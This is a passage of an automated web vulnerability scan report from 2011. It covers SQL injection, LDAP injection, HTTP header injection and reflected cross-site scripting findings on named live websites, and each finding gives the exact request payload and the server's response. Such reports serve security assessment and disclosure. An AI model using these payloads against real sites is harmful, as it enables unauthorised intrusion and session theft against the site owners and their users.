<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...

2.65. http://www.socialfollow.com/button/image/ [b parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the b parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /button/image/?b=1' HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.2.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:40:55 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...

3. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. The two requests produced different responses, indicating that the input may be incorporated unsafely into a conjunctive LDAP query.

Request 1

GET /main/do/*)(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:26 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ec8318b7ec9c1aec4cccc43a2cfd61b4; expires=Sun, 08 May 2011 19:36:26 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:26 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=3889173c8335cc2b8a01f99c2edb15b1b4d5d0d9198b18674dc443739c5eca85e1bf282b; Path=/

Request 2

GET /main/do/*)!(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:27 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=fbdf302905adb668a06e8b9c3ffaa68f; expires=Sun, 08 May 2011 19:36:27 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:27 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The LastName parameter appears to be vulnerable to LDAP injection attacks.

The payloads 7cce339ef57f7f63)(sn=* and 7cce339ef57f7f63)!(sn=* were each submitted in the LastName parameter. The two requests produced different responses, indicating that the input may be incorporated unsafely into a disjunctive LDAP query.

Request 1

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 1

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

Request 2

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)!(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
...[SNIP]...

4. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76cff%0d%0a99e4fb0fdd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76cff%0d%0a99e4fb0fdd0/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76cff
99e4fb0fdd0
/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Sat, 07 May 2011 20:41:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46fd5%0d%0a3cd3e079b91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46fd5%0d%0a3cd3e079b91/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/46fd5
3cd3e079b91
/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070:
Date: Fri, 06 May 2011 21:52:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 9e08b%0d%0a339589a3e58 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=9e08b%0d%0a339589a3e58&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTk4MDA4NjQ3OTY0NjMxNjgvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHFRanRrZjdQTVgxMGl0NWY4QkN6VTAv/QtoXw1C_MI1GkQd8XEk8qAvcgpQ&price=TcWLQAACJL0K7F5J6ZFfBKa_thNHlk_C7IO8oA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtnH9QIvFTb3JCMm8sQeEvsXMDtzvj_EBhpu-vBGkl4STEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NTQ3MDc0MDM1ODk5OTE2oAHg6pnsA7IBDnd3dy50YWdnZWQuY29tugEKMTYweDYwMF9hc8gBCdoBIWh0dHA6Ly93d3cudGFnZ2VkLmNvbS9icm93c2UuaHRtbJgClArAAgTIAtbBjA6oAwHoA-kJ6ANx6AMO6AOkBPUDAACAhIAG3LXNhPKEoZOvAQ%26num%3D1%26sig%3DAGiWqtwZBHxjkNZbavrUkj1D5wqU_jUTrQ%26client%3Dca-pub-6547074035899916%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6547074035899916&format=160x600_as&output=html&h=600&w=160&channel=3193443288&ad_type=text_image&ea=0&alternate_ad_url=http%3A%2F%2Fwww.tagged.com%2Fad_redirect_160.html&flash=10.2.154&url=http%3A%2F%2Fwww.tagged.com%2Fbrowse.html&dt=1304809868551&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304809868555&frm=1&adk=1240161899&ga_vid=423697314.1304809869&ga_sid=1304809869&ga_hid=1080768516&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=4071748756&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304360412; ts=1304767503

Response

HTTP/1.1 404 Not found
Date: Sat, 07 May 2011 18:11:43 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 9e08b
339589a3e58

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

4.4. http://d.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 65753%0d%0abe7cf5083b was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_bk&redirect=65753%0d%0abe7cf5083b HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:42 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://65753
be7cf5083b

Content-length: 0
Connection: close


4.5. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the Location response header. The payload c78b2%0d%0ac733422f1d was submitted in the replace0_ul_ parameter. This caused a response containing an injected HTTP header.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=c78b2%0d%0ac733422f1d&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 06 May 2011 23:00:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=7FF0975F91689439896F745E92A5D2C0; Path=/
Location: http://learn.bridgefront.com/forgetpassword.jsp?status=error&result=0&sendpasswordof=null&login=c78b2
c733422f1d
&email=3
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5. Cross-site scripting (reflected)
There are 183 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload c8274<script>alert(1)</script>5f83f56e00b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480c8274<script>alert(1)</script>5f83f56e00b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:48 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-SM=adver_05-07-2011-18-10-48; expires=Tue, 10-May-2011 18:10:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-VT=adver_05-07-2011-18-10-48_93973011304791848; expires=Thu, 05-May-2016 18:10:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-nUID=adver_93973011304791848; expires=Sat, 07-May-2011 18:25:48 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480c8274<script>alert(1)</script>5f83f56e00b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='93973011304791848';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 6ad07<script>alert(1)</script>d54a737c557 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver6ad07<script>alert(1)</script>d54a737c557&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
